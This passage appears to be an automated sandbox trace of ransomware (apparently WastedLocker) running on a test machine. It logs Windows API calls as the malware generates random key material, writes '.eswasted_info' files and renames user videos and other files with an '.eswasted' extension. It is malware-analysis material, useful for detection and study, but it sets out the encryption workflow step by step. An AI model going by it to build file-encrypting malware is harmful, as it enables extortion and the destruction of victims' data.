dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0080.322] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.322] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.322] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0080.322] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0080.322] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.375] SetEndOfFile (hFile=0x130) returned 1 [0080.378] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0080.378] CloseHandle (hObject=0x130) returned 1 [0080.381] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0080.381] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0080.382] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0080.382] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.382] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned 70 [0080.382] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x296) returned 0x71ec18 [0080.382] lstrcpyW (in: lpString1=0x71eca4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.382] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.382] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0080.383] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.383] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0080.385] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.386] SetEndOfFile (hFile=0x130) returned 1 [0080.386] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.387] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.387] lstrcpyW (in: lpString1=0x71eca4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.387] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.eswasted")) returned 1 [0080.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0080.389] GetLastError () returned 0x5 [0080.389] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.eswasted")) returned 0x23 [0080.389] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.eswasted", dwFileAttributes=0x22) returned 1 [0080.389] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0080.390] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0080.390] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.eswasted", dwFileAttributes=0x23) returned 1 [0080.391] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711260 [0080.391] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0080.392] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0080.392] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.392] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0080.393] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0080.393] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.406] SetEndOfFile (hFile=0x130) returned 1 [0080.409] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.409] CloseHandle (hObject=0x130) returned 1 [0080.453] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0080.453] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0080.454] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0080.454] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.454] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\hLxD7bXrTiVY.avi") returned 78 [0080.454] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a6) returned 0x71ec18 [0080.454] lstrcpyW (in: lpString1=0x71ecb4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.454] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.454] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0080.455] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.455] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\hLxD7bXrTiVY.avi.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\hlxd7bxrtivy.avi.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0080.456] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.457] SetEndOfFile (hFile=0x130) returned 1 [0080.457] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.457] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.457] lstrcpyW (in: lpString1=0x71ecb4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.457] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\hLxD7bXrTiVY.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\hlxd7bxrtivy.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\hLxD7bXrTiVY.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\hlxd7bxrtivy.avi.eswasted")) returned 1 [0080.458] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\hLxD7bXrTiVY.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\hlxd7bxrtivy.avi.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0080.459] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0080.460] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0080.461] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0080.461] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.461] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0080.462] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0080.462] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.471] SetEndOfFile (hFile=0x130) returned 1 [0080.473] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.473] CloseHandle (hObject=0x130) returned 1 [0080.475] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0080.475] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0080.476] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0080.476] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.476] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\qSX-PrSh5pkJIjlX.swf") returned 82 [0080.476] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ae) returned 0x6f65b8 [0080.476] lstrcpyW (in: lpString1=0x6f665c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.476] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.476] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0080.477] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.477] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.477] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\qSX-PrSh5pkJIjlX.swf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\qsx-prsh5pkjijlx.swf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0080.477] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.479] SetEndOfFile (hFile=0x130) returned 1 [0080.479] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.479] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.479] lstrcpyW (in: lpString1=0x6f665c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.479] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\qSX-PrSh5pkJIjlX.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\qsx-prsh5pkjijlx.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\qSX-PrSh5pkJIjlX.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\qsx-prsh5pkjijlx.swf.eswasted")) returned 1 [0080.480] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\qSX-PrSh5pkJIjlX.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\qsx-prsh5pkjijlx.swf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0080.480] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0080.482] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0080.482] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0080.482] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.483] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0080.483] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0080.483] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.532] SetEndOfFile (hFile=0x130) returned 1 [0080.534] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.534] CloseHandle (hObject=0x130) returned 1 [0080.539] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f65b8 | out: hHeap=0x6d0000) returned 1 [0080.539] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0080.540] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0080.540] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.540] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\8I 5.mkv") returned 87 [0080.540] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2b8) returned 0x6f65b8 [0080.540] lstrcpyW (in: lpString1=0x6f6666, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.540] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.540] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0080.541] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.541] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.541] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\8I 5.mkv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\8i 5.mkv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0080.541] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.542] SetEndOfFile (hFile=0x130) returned 1 [0080.542] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.543] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.543] lstrcpyW (in: lpString1=0x6f6666, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.543] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\8I 5.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\8i 5.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\8I 5.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\8i 5.mkv.eswasted")) returned 1 [0080.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\8I 5.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\8i 5.mkv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0080.543] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0080.544] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0080.545] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.545] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.545] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0080.546] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0080.546] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.554] SetEndOfFile (hFile=0x130) returned 1 [0080.556] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.556] CloseHandle (hObject=0x130) returned 1 [0080.560] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f65b8 | out: hHeap=0x6d0000) returned 1 [0080.560] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0080.561] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0080.561] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.561] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\1bqV.avi") returned 100 [0080.561] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2d2) returned 0x71ec18 [0080.561] lstrcpyW (in: lpString1=0x71ece0, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.561] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.561] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0080.562] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.562] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.562] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\1bqV.avi.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\1bqv.avi.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0080.563] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.564] SetEndOfFile (hFile=0x130) returned 1 [0080.564] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.564] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.564] lstrcpyW (in: lpString1=0x71ece0, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.564] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\1bqV.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\1bqv.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\1bqV.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\1bqv.avi.eswasted")) returned 1 [0080.565] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\1bqV.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\1bqv.avi.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0080.565] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0080.565] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0080.566] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.566] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.566] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0080.567] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0080.567] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.575] SetEndOfFile (hFile=0x130) returned 1 [0080.577] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.577] CloseHandle (hObject=0x130) returned 1 [0080.614] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0080.614] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0080.615] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0080.615] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.615] lstrlenW 